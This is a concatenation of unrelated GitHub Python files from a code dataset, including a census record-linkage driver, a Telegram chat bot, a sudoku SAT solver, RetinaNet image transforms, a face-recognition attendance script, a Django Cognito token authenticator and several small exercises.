tokenFreqDict =DWM16_BuildTokenFreqDict.buildTokenFreqDict(refDict)\n # create dictionary of corrections (stdTokenDict), leave empty if not running replacement\n #if global replacement configured, populate stdTokenDict of corrections in DWM25\n if DWM10_Parms.runGlobalCorrection:\n refDict = DWM25_Global_Token_Replace.globalReplace(refDict, tokenFreqDict)\n tokenFreqDict =DWM16_BuildTokenFreqDict.buildTokenFreqDict(refDict)\n moreToDo = True\n print('\\n>>Starting Iterations')\n print('\\n>>Starting Iterations', file=logFile)\n mu = DWM10_Parms.mu\n print('mu start value=', mu)\n print('mu start value=', mu, file=logFile)\n muIterate = DWM10_Parms.muIterate\n print('mu iterate value=', muIterate)\n print('mu iterate value=', muIterate, file=logFile)\n epsilon = DWM10_Parms.epsilon\n print('epsilon start value=', epsilon)\n print('epsilon start value=', epsilon, file=logFile)\n epsilonIterate = DWM10_Parms.epsilonIterate\n print('epsilon iterate value=', epsilonIterate)\n print('epsilon iterate value=', epsilonIterate, file=logFile)\n comparator = DWM10_Parms.comparator\n print('comparator =', comparator)\n print('comparator =', comparator, file=logFile)\n firstIteration = True\n while moreToDo:\n print('\\n****New Iteration\\nSize of refDict =', len(refDict)) \n print('\\n****New Iteration\\nSize of refDict =', len(refDict), file=logFile) \n #blockList = DWM40_BuildBlocks.buildBlocks(logFile, refList, tokenFreqDict)\n blockPairList = DWM42_BuildBlockPairs.buildBlockPairs(refDict, linkIndex, tokenFreqDict)\n if len(blockPairList)==0:\n print('--Ending because blockPairList is empty')\n print('--Ending because blockPairList is empty', file=logFile)\n break\n # If block correction requested, only run once on first iteration\n if DWM10_Parms.blockCorrection and firstIteration:\n changeCount = DWM45_Block_Cleaning.RunBlockCorrections(blockPairList, tokenFreqDict, refDict)\n # if there were block corrections, rebuild token dictionary and re-block\n if changeCount > 0:\n tokenFreqDict=DWM16_BuildTokenFreqDict.buildTokenFreqDict(refDict)\n blockPairList = DWM42_BuildBlockPairs.buildBlockPairs(refDict, linkIndex, tokenFreqDict) \n firstIteration = False\n linkedPairList = DWM55_LinkBlockPairs.linkBlockPairs(blockPairList, refDict, tokenFreqDict)\n if len(linkedPairList)==0:\n print('Ending because linkedPairList is empty')\n print('Ending because linkedPairList is empty', file=logFile)\n break\n clusterList = DWM80_TransitiveClosure.transitiveClosure(linkedPairList)\n if len(clusterList)==0:\n print('--Ending because clusterList is empty') \n print('--Ending because clusterList is empty', file=logFile)\n break \n iterationLinkIndex = DWM90_IterateClusters.iterateClusters(clusterList, refDict, linkIndex)\n print(iterationLinkIndex)\n print(\"\\n>>Itermediate Results from this Iteration\")\n print(\"\\n>>Itermediate Results from this Iteration\", file=logFile)\n # Run iteration profile and statistics if requested\n if DWM10_Parms.runIterationProfile:\n DWM97_ClusterProfile.generateProfile(iterationLinkIndex)\n if DWM10_Parms.truthFileName != '':\n DWM99_ERmetrics.generateMetrics(iterationLinkIndex)\n print('\\n>>End of Iteration, Resetting mu and epsilon')\n print('\\n>>End of Iteration, Resetting mu and epsilon', file=logFile)\n mu += muIterate\n mu = round(mu, 2)\n DWM10_Parms.mu = mu\n print('>>>New Value of mu = ',mu)\n print('>>>New Value of mu = ',mu, file=logFile)\n epsilon += epsilonIterate\n epsilon = round(epsilon, 2)\n DWM10_Parms.epsilon = epsilon\n print('>>>New Value of epsilon = ',epsilon)\n print('>>>New Value of epsilon = ',epsilon, file=logFile)\n if mu > 1.0:\n moreToDo = False\n print('Ending because mu > 1.0')\n print('Ending because mu > 1.0', file=logFile)\n # End of iterations\n # write Link Index to text file\n DWM96_WriteLinkIndex.writeLinkIndex(linkIndex, refDict)\n # Generate Cluster Profile\n DWM97_ClusterProfile.generateProfile(linkIndex)\n # Generat ER Metrics if truthFileName was given\n if DWM10_Parms.truthFileName != '':\n DWM99_ERmetrics.generateMetrics(linkIndex)\n DWM100_ReportData.reportData()\n now2 = datetime.datetime.now()\n print(\"\\nTotal File Runtime =\", now2-now1, file=logFile)\n print(\"\\nEnd of File \",parmFileName)\n print('Time to run File ', now2-now1)\n print(\"End of File \",parmFileName, file=logFile)\n if multi==False:\n break\n endTime = time.time()\n totalTime = endTime - startTime\n print(\"All Files Total Runtime =\", totalTime/60, \" minutes\")\n print(\"All Files Total Runtime =\", totalTime/60, \" minutes\", file=logFile)\n print(\"End of Program\")\n print(\"End of Program\", file=logFile)\n logFile.close()\n DWM10_Parms.workbook.close()\n\n","repo_name":"OnaisKhanMohammed/Census-Linking","sub_path":"DWM00_Driver.py","file_name":"DWM00_Driver.py","file_ext":"py","file_size_in_byte":11088,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"14251239841","text":"class Curso():\r\n def __init__(self,nom,cre,pro):\r\n self.nombre = nom\r\n self.creditos = cre\r\n self.profesion = pro\r\n self.__imparticion = \"presencial\" #Propiedad encapsulada\r\n\r\n def mostrarDatos(self):\r\n dat = \"Nombre: {} / Creditos: {} / Modo de imparticion: {}\"\r\n print(dat.format(self.nombre,self.creditos,self.__imparticion))\r\n docenteAsignado = self.__verificarDocente()\r\n if docenteAsignado:\r\n print(\"Existe docente asigando\")\r\n else:\r\n print(\"No es necesario asignar un docente...\")\r\n\r\n def __verificarDocente(self):\r\n # print(\"Vericando si existe un docente asignado...\")\r\n if self.__imparticion == \"presencial\":\r\n return True\r\n else:\r\n return False\r\n\r\n def __str__(self):\r\n texto = \"nombre: {} - creditos: {}\"\r\n return texto.format(self.nombre,self.creditos)\r\n\r\n# curso1 = Curso(\"Matematica\",5,\"Ingenieria civil\")\r\n# print(curso1)\r\n# curso1.mostrarDatos()\r\n\r\n\r\n# curso2 = Curso(\"Lenguaje\",4,\"Ingenieria industrial\")\r\n# print(curso2.nombre)","repo_name":"FernandoReyesV2/S9-TAREA_2","sub_path":"Ejercicio_27.py","file_name":"Ejercicio_27.py","file_ext":"py","file_size_in_byte":1101,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"8964674296","text":"import sys\nfrom collections import defaultdict, deque\n\nfrom telegram.ext import Updater, CommandHandler, MessageHandler\n\nfrom constants import TRIGGERS\n\nTOKEN = ''\n\n\n\nDEFAULT_SETTINGS = {\n 'autoninja': True\n}\n\n\ndef get_default_settings():\n return DEFAULT_SETTINGS\n\n\ndef chat_queue():\n return deque(50*[None], maxlen=50)\n\n\nmessages = defaultdict(chat_queue)\nsettings = defaultdict(get_default_settings)\n\n\nCHAT_ID_PODEMOS_HABLAR = -213095736\n\n\ndef hello(bot, update):\n update.message.reply_text(\n 'Hola {} ...querés ninja'.format(update.message.from_user.first_name))\n\n\ndef autoninja(bot, update):\n chat_id = update.message.chat.id\n option = update.message.text.split(' ')\n chat_setting = settings[chat_id]\n\n if len(option) == 1:\n autoninja_status = chat_setting['autoninja']\n print('Toggling autoninja')\n autoninja_new_status = not autoninja_status\n else:\n autoninja_new_status = False if option[1] == 'off' else True\n\n chat_setting['autoninja'] = autoninja_new_status\n update.message.reply_text(\n 'Modo autoninja {}'.format('on' if autoninja_new_status else 'off'))\n\n\ndef ninjasettings(bot, update):\n chat_id = update.message.chat.id\n option = update.message.text.split(' ')\n chat_setting = settings[chat_id]\n autoninja_status = chat_setting['autoninja']\n\n update.message.reply_text(\n 'Settings: Modo autoninja {}'.format('on' if autoninja_status else 'off'))\n\n\ndef ninja(bot, update):\n try:\n chat_id = update.message.chat.id\n message_queue = messages[chat_id]\n message = message_queue[0]\n except:\n print('Error')\n\n if message:\n message.reply_text(\n '{}...{}...claramente..necesita xxx...'.format(message.text,\n message.from_user.first_name))\n else:\n update.message.reply_text(\n '{}...dale que quien quiere xxxx sos vos'.format(update.message.from_user.first_name))\n\n\ndef _sanitize_message(content):\n content = content.lower()\n content = content.replace(',', ' ')\n content = content.replace(',', ' ')\n content = content.replace('.', ' ')\n content = content.replace(';', ' ')\n content = content.replace('#', ' ')\n\n return ' '.join(content.split())\n\ndef _get_ninjable_content(message_content):\n message_content_sanitized = _sanitize_message(message_content).split(' ')\n\n ninjable_content = list(filter(message_content_sanitized.__contains__,\n TRIGGERS.keys()))\n\n return ninjable_content[0] if ninjable_content else None\n\ndef process_message(bot, update):\n chat_id = update.message.chat.id\n chat_setting = settings[chat_id]\n\n print('Processsing %s on %s' % (update.message.text, str(chat_id)) )\n message_content = update.message.text\n if message_content[0] != ['/']:\n message_queue = messages[chat_id]\n # Do not put messages here that are commands for other bots\n message_queue.appendleft(update.message)\n\n ninjable_content = _get_ninjable_content(message_content)\n\n if chat_setting['autoninja'] and ninjable_content:\n reply_message_content = TRIGGERS[ninjable_content]\n update.message.reply_text(\n '{} {}'.format(reply_message_content, update.message.from_user.first_name))\n\n\nif __name__=='__main__':\n updater = Updater(TOKEN)\n\n updater.dispatcher.add_handler(CommandHandler('helloninja', hello))\n updater.dispatcher.add_handler(CommandHandler('ninja', ninja))\n updater.dispatcher.add_handler(CommandHandler('autoninja', autoninja))\n updater.dispatcher.add_handler(CommandHandler('ninjasettings', ninjasettings))\n updater.dispatcher.add_handler(MessageHandler(None,callback=process_message))\n\n updater.start_polling()\n updater.idle()\n","repo_name":"C-CodigoLibre/femininja","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3825,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"32283765311","text":"import logging\n\n# 设置日志输出样式\nlogging.basicConfig(\n level=logging.INFO,\n format='levelname:%(levelname)s filename: %(filename)s '\n 'outputNumber: [%(lineno)d] thread: %(threadName)s output msg: %(message)s'\n ' - %(asctime)s ',\n datefmt='[%d/%b/%Y %:H%:M%S]'\n)\n\nlogger = logging.getLogger(__name__)\n\nif __name__ == '__main__':\n logger.info('this is a info log')\n logger.info('this is a info log 1')\n logger.error('this is a error errorlog')\n logger.error('this is a error errorlog 1')","repo_name":"focusdroid-python/flask-demo","sub_path":"scrapy/beforeSpider/test/log_b.py","file_name":"log_b.py","file_ext":"py","file_size_in_byte":537,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"33551626778","text":"#!/usr/bin/env python3\n# -*-coding:utf-8 -*-\n# __author__:Jonathan\n# email:nining1314@gmail.com\nfrom multiprocessing import Pool\n\n\ndef work(n):\n return n ** 2\n\nif __name__ == '__main__':\n pool = Pool(6)\n res_l = []\n for i in range(6):\n res = pool.apply_async(work, args=(i, ))\n res_l.append(res)\n\n for item in res_l:\n print(item.get()) # 取得异步执行的结果\n \"\"\"\n 应用场景:爬虫,线程池去爬网页,爬下来的内容交给回调函数去分析处理\n \"\"\"\n","repo_name":"ni-ning/LearnPython","sub_path":"10Process/进程池/进程池之回调函数.py","file_name":"进程池之回调函数.py","file_ext":"py","file_size_in_byte":523,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"648038954","text":"from dpll import *\nfrom sudoku import *\n\n\ndef resitev(rezult):\n\t\"\"\"Iz slovarja spremenljivk, ki jih uporablja pretvorba na SAT, \n\tta funkcija izlusci slovar vrednosti zasedenih polj. \"\"\"\n\t\n\tpolja = {}\n\tfor spr in rezult:\n\t\tif rezult[spr]==T():\n\t\t\ttrojica = tuple(int(i) for i in spr.split(\",\"))\n\t\t\tpolja[(trojica[0],trojica[1])] = str(trojica[2])\n\treturn polja\n\n\t\n\ndef narisi(polja):\n\t\"\"\"Narise sudoku z danimi izpolnjenimi polji.\"\"\"\n\n\tfor vr in range(1, 10):\n\t\tif vr==1 or vr==4 or vr==7:\n\t\t\tprint(\"\\t _________________________\")\n\t\tvrstica = [polja[(vr,st)] for st in range(1, 10)]\n\t\tvrstica = \"\\t | \" + \" \".join(vrstica[:3]) + \" | \" + \" \".join(vrstica[3:6]) + \" | \" + \" \".join(vrstica[6:]) + \" | \"\n\t\tprint(vrstica)\n\tprint(\"\\t _________________________\\n\\n\")\n\n\n\ndef preberi(fajlSprimeri):\n\t\"\"\"Prebere fajl s primeri sudokujev. Vrne seznam trojic danih polj.\"\"\"\n\n\tfile = open(fajlSprimeri)\t\n\tpolja = [[],[],[]]\n\n\tfor vrstica,line in enumerate(file):\n\t\tif vrstica<14 or vrstica%2==1:\n\t\t\tcontinue\n\t\telif vrstica<37 and vrstica>31:\n\t\t\tcontinue\n\t\telif vrstica>55 and vrstica<61 :\n\t\t\tcontinue\n\t\telif vrstica>78:\n\t\t\tbreak\n\t\telse:\n\t\t\tif vrstica<31:\n\t\t\t\tvrstSud = (vrstica-12)//2\n\t\t\t\tP = 0\n\t\t\telif vrstica<55:\n\t\t\t\tvrstSud = (vrstica-36)//2\n\t\t\t\tP = 1\n\t\t\telse:\n\t\t\t\tvrstSud = (vrstica-60)//2\n\t\t\t\tP = 2\n\n\t\t\tl = [k.strip(\" \") for k in line.split(\"|\")[1:-1]]\n\t\t\tL = len(l) #=9, ce gre vse po planu... :|\n\t\t\tp = [(vrstSud,i,int(l[i])) for i in range(L) if l[i]!=\"\"]\n\t\t\tpolja[P].extend(p)\n\n\tfile.close()\n\treturn polja\n\t\t\n\n\n\n\ndef preveri():\n\ti = 0\n\tprimeri = preberi('primeri.txt')\n\tfor polja in primeri:\n\t\ti += 1\n\t\tprint(\" Sudoku št. {0}\".format(i))\n\t\tprint(\"=================\") \n\t\tformula = sudoku(polja).cnf()\n\t\tresljivo = dpll(formula)\n\t\tif resljivo==0:\n\t\t\tprint(\"Ta sudoku ni rešljiv. \\n\")\n\t\telse:\n\t\t\tpolja2 = resitev(resljivo)\n\t\t\tprint(\"Sudoku je možno rešiti. \\n\\tRešitev: \\n\")\n\t\t\tnarisi(polja2)\n\t\tprint(\"\\n\\n\")\n\n\t\n\n######\n\nY = input(\"\\nProsim, vpiši znana polja v datoteko primeri.txt. Ko končaš jo shrani, zapri in pritisni enter. \\n\")\npreveri()\n","repo_name":"EvaBr/LVRSAT","sub_path":"resljivostSudoku.py","file_name":"resljivostSudoku.py","file_ext":"py","file_size_in_byte":2048,"program_lang":"python","lang":"sl","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"8506954660","text":"'''Perform transforms on both PIL image and object boxes.'''\nimport math\nimport random\n\nimport torch\nimport torchvision.transforms as transforms\n\nfrom PIL import Image, ImageDraw\n\n\ndef resize(img, boxes, size, max_size=1000):\n '''Resize the input PIL image to the given size.\n\n Args:\n img: (PIL.Image) image to be resized.\n boxes: (tensor) object boxes, sized [#ojb,4].\n size: (tuple or int)\n - if is tuple, resize image to the size.\n - if is int, resize the shorter side to the size while maintaining the aspect ratio.\n max_size: (int) when size is int, limit the image longer size to max_size.\n This is essential to limit the usage of GPU memory.\n Returns:\n img: (PIL.Image) resized image.\n boxes: (tensor) resized boxes.\n '''\n w, h = img.size\n if isinstance(size, int):\n size_min = min(w,h)\n size_max = max(w,h)\n sw = sh = float(size) / size_min\n if sw * size_max > max_size:\n sw = sh = float(max_size) / size_max\n ow = int(w * sw + 0.5)\n oh = int(h * sh + 0.5)\n else:\n ow, oh = size\n sw = float(ow) / w\n sh = float(oh) / h\n return img.resize((ow,oh), Image.BILINEAR), \\\n boxes*torch.Tensor([sw,sh,sw,sh])\n\ndef random_crop(img, boxes):\n '''Crop the given PIL image to a random size and aspect ratio.\n\n A crop of random size of (0.08 to 1.0) of the original size and a random\n aspect ratio of 3/4 to 4/3 of the original aspect ratio is made.\n\n Args:\n img: (PIL.Image) image to be cropped.\n boxes: (tensor) object boxes, sized [#ojb,4].\n\n Returns:\n img: (PIL.Image) randomly cropped image.\n boxes: (tensor) randomly cropped boxes.\n '''\n success = False\n for attempt in range(10):\n area = img.size[0] * img.size[1]\n target_area = random.uniform(0.56, 1.0) * area\n aspect_ratio = random.uniform(3. / 4, 4. / 3)\n\n w = int(round(math.sqrt(target_area * aspect_ratio)))\n h = int(round(math.sqrt(target_area / aspect_ratio)))\n\n if random.random() < 0.5:\n w, h = h, w\n\n if w <= img.size[0] and h <= img.size[1]:\n x = random.randint(0, img.size[0] - w)\n y = random.randint(0, img.size[1] - h)\n success = True\n break\n\n # Fallback\n if not success:\n w = h = min(img.size[0], img.size[1])\n x = (img.size[0] - w) // 2\n y = (img.size[1] - h) // 2\n\n img = img.crop((x, y, x+w, y+h))\n boxes -= torch.Tensor([x,y,x,y])\n boxes[:,0::2].clamp_(min=0, max=w-1)\n boxes[:,1::2].clamp_(min=0, max=h-1)\n return img, boxes\n\ndef center_crop(img, boxes, size):\n '''Crops the given PIL Image at the center.\n\n Args:\n img: (PIL.Image) image to be cropped.\n boxes: (tensor) object boxes, sized [#ojb,4].\n size (tuple): desired output size of (w,h).\n\n Returns:\n img: (PIL.Image) center cropped image.\n boxes: (tensor) center cropped boxes.\n '''\n w, h = img.size\n ow, oh = size\n i = int(round((h - oh) / 2.))\n j = int(round((w - ow) / 2.))\n img = img.crop((j, i, j+ow, i+oh))\n boxes -= torch.Tensor([j,i,j,i])\n boxes[:,0::2].clamp_(min=0, max=ow-1)\n boxes[:,1::2].clamp_(min=0, max=oh-1)\n return img, boxes\n\ndef random_flip(img, boxes):\n '''Randomly flip the given PIL Image.\n\n Args:\n img: (PIL Image) image to be flipped.\n boxes: (tensor) object boxes, sized [#ojb,4].\n\n Returns:\n img: (PIL.Image) randomly flipped image.\n boxes: (tensor) randomly flipped boxes.\n '''\n if random.random() < 0.5:\n img = img.transpose(Image.FLIP_LEFT_RIGHT)\n w = img.width\n xmin = w - boxes[:,2]\n xmax = w - boxes[:,0]\n boxes[:,0] = xmin\n boxes[:,2] = xmax\n return img, boxes\n\ndef draw(img, boxes):\n draw = ImageDraw.Draw(img)\n for box in boxes:\n draw.rectangle(list(box), outline='red')\n img.show()\n\n\ndef test():\n img = Image.open('./image/000001.jpg')\n boxes = torch.Tensor([[48, 240, 195, 371], [8, 12, 352, 498]])\n img, boxes = random_crop(img, boxes)\n print(img.size)\n draw(img, boxes)\n\n# test()\n","repo_name":"kuangliu/pytorch-retinanet","sub_path":"transform.py","file_name":"transform.py","file_ext":"py","file_size_in_byte":4190,"program_lang":"python","lang":"en","doc_type":"code","stars":989,"dataset":"github-code","pt":"72"} +{"seq_id":"74683028392","text":"import json\nimport sqlite3\nimport cv2\nimport numpy as np\nfrom dsClass.align_custom import AlignCustom\nfrom dsClass.face_feature import FaceFeature\nfrom dsClass.mtcnn_detect import MTCNNDetect\nfrom dsClass.tf_graph import FaceRecGraph\n\ndef add_new_student(student_name, student_index_number):\n # Connect to SQLite database\n con = sqlite3.connect(\"../attendance_db.sqlite\")\n cur = con.cursor()\n\n # Create instances of various classes\n face_rec_graph = FaceRecGraph() # Face recognition graph\n aligner = AlignCustom() # Face alignment object\n extracted_face_feature = FaceFeature(face_rec_graph) # Face feature extractor object\n face_detect = MTCNNDetect(face_rec_graph, scale_factor=2) # Face detection object\n video_from_camera = cv2.VideoCapture(0) # Video capture object\n\n # Load face recognition data from a file\n face_rec_file = open(\"../dsClass/facerec_128D.txt\", \"r\")\n data_from_face_rec_file = json.loads(face_rec_file.read())\n\n # Create dictionaries to store images and corresponding face features\n student_images = {\"Left\": [], \"Right\": [], \"Center\": []}\n student_face_features = {\"Left\": [], \"Right\": [], \"Center\": []}\n\n # Extract face features from the video feed\n while True:\n _, frame = video_from_camera.read()\n rects, landmarks = face_detect.detect_face(frame, 80)\n for i, rect in enumerate(rects):\n aligned_frame, pos = aligner.align(160, frame, landmarks[i])\n if len(aligned_frame) == 160 and len(aligned_frame[0]) == 160:\n # Store aligned frames in a dictionary based on their position\n student_images[pos].append(aligned_frame)\n cv2.imshow(\"Recording Face, Pres 'q' to save and close window\", aligned_frame)\n key = cv2.waitKey(1) & 0xFF\n if key == 30 or key == ord(\"q\"):\n break\n\n # Save the name of the student to the student table in the database\n cur.execute(\"INSERT INTO student(name, index_number) VALUES(?, ?)\", (student_name, student_index_number),)\n con.commit()\n\n # Compute the mean of the extracted features for each position and store them in a dictionary\n for pos in student_images:\n student_face_features[pos] = [np.mean(extracted_face_feature.get_features(student_images[pos]), axis=0).tolist()]\n\n # Append the new face feature dictionary to the loaded data from the file\n data_from_face_rec_file[student_name] = student_face_features\n\n # Overwrite the face recognition file with the updated data\n face_rec_file = open(\"../dsClass/facerec_128D.txt\", \"w\")\n face_rec_file.write(json.dumps(data_from_face_rec_file))\n\n return True\n","repo_name":"Brianchib/attendance_project","sub_path":"src/add_new_student.py","file_name":"add_new_student.py","file_ext":"py","file_size_in_byte":2667,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15034522109","text":"N,M = map(int,input().split())\r\nMod = 10**9+7\r\nfrom collections import defaultdict\r\nF = [0]*N\r\nfor i in range(N):\r\n F[i] = int(input())\r\nl = [0]*N\r\nused = [False]*(M+1)\r\nj = -1\r\nfor i in range(N):\r\n while True:\r\n if j == N-1:\r\n break\r\n j += 1\r\n if used[F[j]]:\r\n j -= 1\r\n break\r\n used[F[j]] = True\r\n l[i] = j-i+1\r\n used[F[i]] = False\r\nl.reverse()\r\ndp = [0]*N\r\ncdp = [0]*(N+1)\r\ndp[0] = 1\r\ncdp[0] = 1\r\nfor i in range(1,N):\r\n if i-1-l[i] < -1:\r\n dp[i] = cdp[i-1]+1\r\n else:\r\n dp[i] = cdp[i-1]-cdp[i-l[i]-1]\r\n cdp[i] = cdp[i-1]+dp[i]\r\n dp[i] %= Mod\r\n cdp[i] %= Mod\r\nprint(dp[N-1])","repo_name":"Kawser-nerd/CLCDSA","sub_path":"Source Codes/AtCoder/abc017/D/3553073.py","file_name":"3553073.py","file_ext":"py","file_size_in_byte":676,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"15492212244","text":"from time import time\nfrom rest_framework import exceptions\nfrom rest_framework.authentication import BaseAuthentication, get_authorization_header\nfrom django.utils.translation import gettext_lazy as _\n\nfrom django.contrib.auth.models import AnonymousUser\n\nimport os\nfrom jose import jwk, jwt\nfrom jose.utils import base64url_decode\n\n\n# We're using this to bypass the Django user model since we're using Cognito\nclass CognitoUser(AnonymousUser):\n @property\n def is_authenticated(self):\n return True\n\n\nclass CognitoTokenAuthentication(BaseAuthentication):\n keys = [\n {\n \"alg\": \"RS256\",\n \"e\": \"AQAB\",\n \"kid\": \"E3e3Qo3bI+kX3hIaWxqXSxkbt+t1+2CE5oiIckNlOA0=\",\n \"kty\": \"RSA\",\n \"n\": \"vGCZfKCogqCKmMXnOq6kLoGIE64UCHQVd6k2J8VINLkm2jnOI3BU5u1Q8Csl5NvSsNzWTuKQbvHmLz7q21SabjKD_pvKxRgt4lFGJAbadIDbdqsGUHzQHAaBJaVUhm32eMapTECbicIQBGCicsQ8XEUu7q2NHiy3UrU7gbvqjf7z9DV9XaTFlIU4S32Jn35BouLshesmFcdCsnxA7m3Ra4psg7ZiZZNrPZTm-rimdqvH5RNqPhs_MzSJ7g0KpEJd2WyCBzObLo_WIBGVo8dlIRJXRr4KvcNvwXZo2oTqQ17kxz1C1HqYFH4sr79UTPkGh0B_NzhaQ_a86ks2dSYjDQ\",\n \"use\": \"sig\",\n },\n {\n \"alg\": \"RS256\",\n \"e\": \"AQAB\",\n \"kid\": \"Eb6mi7UDnWUNFJMbku8/oT5S1oB6AVsXRWY5+J8bnAE=\",\n \"kty\": \"RSA\",\n \"n\": \"nfEWkRZk1VlWJfp-BEvHIDKd7vj0ImJ_MYNj3gRQAUEfHo0f5AV7oC3x4HWD5nYzMcQlyURYQsqpViekTWBcG3vef-6OYzsdQS_Pw4-eEZ-PHftMeBd6-6r-pcmXEZ4gPbA0sk4baLoF9fBOKohdQTPNfbQpuEgBsHHOmWJ-VZrQ3WOHLEPhFS_d9ewVGfUgDLNxvy0zXPqVa1555PoIjjjwDXFHuHqhMj5Or12pjMnymhLwELxGnnRJjyxzKw75z6FNwWqlQFupswGUNjqs1swfxkZsUM10c4qgSFk1orjJjv9CIjH_25QuRRZlm0boqbcSkCchs0RCbW-BPrkEEw\",\n \"use\": \"sig\",\n },\n ]\n\n keyword = \"Token\"\n\n def authenticate(self, request):\n auth = get_authorization_header(request).split()\n\n if len(auth) == 1:\n msg = _(\"Invalid token header. No credentials provided.\")\n raise exceptions.AuthenticationFailed(msg)\n elif len(auth) > 2:\n msg = _(\"Invalid token header. Token string should not contain spaces.\")\n raise exceptions.AuthenticationFailed(msg)\n\n if not auth or auth[0].lower() != self.keyword.lower().encode():\n return None\n\n token = auth[1].decode()\n headers = jwt.get_unverified_headers(token)\n kid = headers[\"kid\"]\n\n key_index = -1\n for i in range(len(self.keys)):\n if kid == self.keys[i][\"kid\"]:\n key_index = i\n break\n\n if key_index == -1:\n raise exceptions.AuthenticationFailed()\n\n public_key = jwk.construct(self.keys[key_index])\n message, encrypted_signature = str(token).rsplit(\".\", 1)\n decoded_signature = base64url_decode(encrypted_signature.encode(\"utf-8\"))\n\n if not public_key.verify(message.encode(\"utf-8\"), decoded_signature):\n raise exceptions.AuthenticationFailed()\n\n claims = jwt.get_unverified_claims(token)\n\n if time() > claims[\"exp\"]:\n raise exceptions.AuthenticationFailed()\n\n return (CognitoUser(), None)\n","repo_name":"parinzee/BCIS-app","sub_path":"backend/backend/api/authentication.py","file_name":"authentication.py","file_ext":"py","file_size_in_byte":3104,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"35545758834","text":"__author__ = \"Kyle Vitautas Lopin\"\n\n# standard libraries\nimport time\nimport tkinter as tk\n\n# local files\nfrom usb_comm import SerialComm\n\n\nclass Monitor(tk.Tk):\n def __init__(self):\n tk.Tk.__init__(self)\n self.device = SerialComm()\n self.entry = tk.Entry(self)\n self.entry.pack()\n tk.Button(self, text=\"Send message\", command=self.send_message).pack()\n self.poll_for_input()\n\n def send_message(self):\n self.device.write_data(self.entry.get())\n\n def poll_for_input(self):\n self.after(10, self.poll_for_input)\n data = self.device.poll_for_data()\n if data:\n print(f\"Got data: {data}\")\n print(f\"len data: {len(data)}\")\n\n\nif __name__ == '__main__':\n app = Monitor()\n print(\"check1\")\n app.geometry(\"400x400\")\n app.mainloop()\n","repo_name":"KyleLopin/Potentiostat_GUI","sub_path":"tools/serial_monitor.py","file_name":"serial_monitor.py","file_ext":"py","file_size_in_byte":832,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"72"} +{"seq_id":"17171052098","text":"with open(\"barak ovama.txt\", mode=\"r\") as b_file:\r\n for line in b_file.readlines():\r\n print(line.strip())\r\n\r\nprint(\"shahinur \",end=\"\")\r\nprint(\"finised\")\r\nwith open(\"barak ovama.txt\", mode=\"r\") as b_file:\r\n for line in b_file.readlines():\r\n words=line.strip().split(\" \")#strip-string return kore\r\n print(words)\r\nprint(\"word finised\")\r\n\r\nwith open(\"barak ovama.txt\", mode=\"r\") as b_file:\r\n worde_all=[]\r\n for line in b_file.readlines():\r\n words=line.strip().split()\r\n worde_all += words\r\n unique_word = set(worde_all)\r\n print(worde_all)\r\n print(len(worde_all))\r\n print(unique_word)\r\n print(len(unique_word))\r\n\r\n with open(\"unique_word.txt\",mode=\"w\") as write_file:\r\n for item in unique_word:\r\n write_file.write(item)\r\n write_file.write(\" \\n\")\r\n\r\nprint(\"finised\")","repo_name":"SWE-Shahinur/Python-Googler_Zulkarnine_Mahmud","sub_path":"FileIO.py","file_name":"FileIO.py","file_ext":"py","file_size_in_byte":854,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"8594167149","text":"import tkinter.tix\n\n\ndef a():\n a, b, c, d = map(int, input().split())\n ans = 'Takahashi'\n if a < c:\n return print(ans)\n elif a == c:\n if b <= d:\n return print(ans)\n else:\n return print('Aoki')\n else:\n return print('Aoki')\n\ndef b():\n _ = input()\n li = list(map(int, input().split()))\n li.sort()\n nums = list(range(0,2001))\n for i in li:\n if i in nums:\n nums.remove(i)\n return print(nums[0])\n\ndef rec(ans:list, a_li:list, b_li:list, n, i, k):\n if ans:\n ans.append(a_li[0])\n ans = rec(ans, a_li, b_li, n, i + 1, k)\n if len(ans) == n:\n return ans\n else:\n ans.pop()\n ans.append(b_li[0])\n ans = rec(ans, a_li, b_li, n, i + 1, k)\n if len(ans) == n:\n return ans\n return []\n if abs(ans[-1] - a_li[i]) <= k:\n ans.append(a_li[i])\n elif abs(ans[-1] - b_li[i]) <= k:\n ans.append(b_li[i])\n else:\n ans.pop()\n i -= 1\n return rec(ans, a_li, b_li, n, i, k)\n\ndef c():\n n, k = map(int, input().split())\n a_li = list(map(int, input().split()))\n b_li = list(map(int, input().split()))\n ans = []\n i = 0\n t_li = [0] * n # 1 -> a 2-> b 0 -> no answer\n while i < n:\n print(f\"ans:{ans} tli:{t_li} i:{i}\")\n if not ans:\n if t_li[0] == 0:\n ans.append(a_li[i])\n elif t_li[0] == 1:\n ans.append(b_li[i])\n else:\n return print('No')\n t_li[i] += 1\n i += 1\n continue\n if t_li[i] == 0 and abs(ans[i-1] - a_li[i]) <= k:\n ans.append(a_li[i])\n elif t_li[i] == 1 and abs(ans[i-1] - b_li[i]) <= k:\n ans.append(b_li[i])\n elif t_li[i] < 2:\n t_li[i] += 1\n continue\n else:\n ans.pop()\n i -= 1\n\n i += 1\n print(t_li)\n print(ans)\n return print('Yes')\n\nif __name__ == '__main__':\n c()","repo_name":"RyutaSato/abc_log","sub_path":"245.py","file_name":"245.py","file_ext":"py","file_size_in_byte":2040,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"564280519","text":"import pandas as pd\n\nINPUT_DATA = './data/quora_duplicate_questions.tsv'\nFILTERED_DATA = './data/filtered.tsv' ################# Name of final 